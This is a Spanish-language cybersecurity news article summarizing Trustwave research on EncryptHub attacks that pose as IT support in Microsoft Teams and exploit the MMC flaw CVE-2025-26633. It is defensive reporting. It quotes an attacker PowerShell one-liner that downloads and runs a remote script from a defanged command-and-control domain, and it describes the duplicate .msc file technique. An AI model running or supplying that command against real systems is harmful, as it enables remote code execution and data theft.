¿Respondiste al soporte de TI en Teams? ¡Felicitaciones! El troyano está en tu PC con permisos que exceden los tuyos.

Redazione RHC : 15 agosto 2025 14:42

El equipo de investigación de Trustwave SpiderLabs ha identificado una nueva ola de ataques a EncryptHub que combinan errores humanos y la explotación de una vulnerabilidad en la Consola de Administración de Microsoft. Los operadores se hacen pasar por personal de soporte técnico, los contactan a través de Microsoft Teams y luego convencen al «cliente» de que abra el acceso remoto y ejecute una serie de comandos, antes de desplegar la carga útil para el error CVE-2025-26633, conocido como MSC EvilTwin.

Al mismo tiempo, el grupo utiliza canales de distribución no estándar, incluyendo la plataforma de soporte Brave, lo que dificulta el filtrado de tráfico y el análisis de incidentes. Los informes también mencionan otros nombres del mismo equipo: LARVA-208 y Water Gamayun; Anteriormente, el grupo había sido asociado con ataques contra desarrolladores de Web3 y el abuso de la plataforma Steam, y hasta febrero, 618 organizaciones en todo el mundo se habían visto comprometidas.

El primer paso es la ingeniería social. La víctima recibe una solicitud de Teams de un «informático», tras lo cual el contacto insistentemente ofrece iniciar una sesión remota y «revisar la configuración«. Una vez establecida la sesión, se ejecuta una línea como esta en la máquina:

powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -Command «Invoke-RestMethod -Uri ‘hxxps://cjhsbam[.]com/payload/runner.ps1’ | Invoke-Expression»

Esta llamada descarga y ejecuta el script runner.ps1, que proporciona una plataforma para explotar la vulnerabilidad. MMC.

Luego viene el truco con los archivos .msc duplicados. El cargador crea dos archivos de consola con el mismo nombre: una copia limpia se coloca en el directorio esperado y una copia maliciosa se coloca en la ruta MUIPath, generalmente el directorio en-US. Al iniciar el complemento legítimo, aparece el proceso mmc.exe y, debido al error de EvilTwin MSC, primero busca el archivo con el mismo nombre en MUIPath. Como resultado, el sistema detecta el archivo «mirror» de en-US y ejecuta el código de los atacantes. Aunque la falla se describió públicamente como un día cero en marzo de 2025, se encontraron muestras de dichos archivos en ataques activos desde febrero. Hay un parche, pero la recepción sigue funcionando en estaciones sin parche.

Tras eliminar los duplicados, runner.ps1 modifica el contenido del complemento malicioso: el marcador de posición htmlLoaderUrl se reemplaza con la dirección del nodo de comando y control de EncryptHub, una cadena como hxxps://cjhsbam[.]com/payload/build[.]ps1. Tras recibir el enlace, .msc ejecuta el siguiente paso.

El script build.ps1 recopila los «dedos» del sistema y los envía a C2, registra el mecanismo de ejecución automática, gestiona el canal de comunicación y espera a que se ejecute la tarea. Los comandos se reciben cifrados (AES), se descifran localmente y se ejecutan directamente en el nodo mediante Invoke-Expression. Entre los módulos típicos se incluye el ladrón PowerShell Fickle Stealer, que extrae archivos confidenciales, información del entorno y datos de la billetera de criptomonedas.

Durante la investigación, surgieron herramientas Go adicionales con las que los operadores están reemplazando gradualmente los scripts de PowerShell. Una de ellas, SilentCrystal, replica la lógica del gestor de arranque, pero está comprimida en un binario nativo. Primero, se crea una carpeta pseudo-sistema «C:WindowsSystem32» con un espacio después de la palabra «Windows», lo que copia visualmente el directorio real y confunde a las herramientas de seguridad. A continuación, la muestra envía un POST al servidor de control con una clave API codificada y un nombre de archivo aleatorio con extensión .zip; en respuesta, se envía un enlace legítimo al soporte de Brave.

Los usuarios novatos no pueden subir archivos adjuntos a este sitio, lo que significa que EncryptHub tiene una cuenta con permisos de carga. El archivo del soporte de Brave se descarga y descomprime, tras lo cual el marcador {URI} en WF.msc se reemplaza con la dirección del centro de comando. A continuación, se lanza el archivo .msc estándar y, gracias a CVE-2025-26633, la consola detecta la sustitución del directorio «false» y ejecuta el código solicitado.

Otro descubrimiento interesante es un «proxy de marcadores» en Go compatible con SOCKS5. Sin parámetros, se inicia como cliente, se conecta al alojamiento de los atacantes utilizando los detalles codificados en el binario y desvía el tráfico a través de un túnel. También hay un modo servidor: se carga un archivo con datos de autenticación, se genera automáticamente un certificado TLS autofirmado (el campo Nombre Común contiene la línea de Calcetines Inversos y el nombre DNS es localhost), tras lo cual el proceso comienza a aceptar múltiples conexiones, paralelizando el procesamiento mediante goroutines. Cuando se establece una conexión, el agente inicia sesión en Telegram con el estado «inicio», donde sustituye el nombre de usuario, el dominio de la variable de entorno USERDOMAIN, el resultado de la verificación de los derechos administrativos mediante una llamada de sesión de red, así como la IP pública, la geoetiqueta y el proveedor tras la solicitud a https://ipinfo.io/json. El análisis de la infraestructura reveló solicitudes de carga útil a hxxps://safesurf.fastdomain-uoemathhvq.workers.dev/payload/pay[.]ps1, otro componente del framework C2.

Redazione
Red Hot Cyber's editorial team consists of a collection of individuals and anonymous sources who actively collaborate by providing advance information and news on cyber security and IT in general.

Lista degli articoli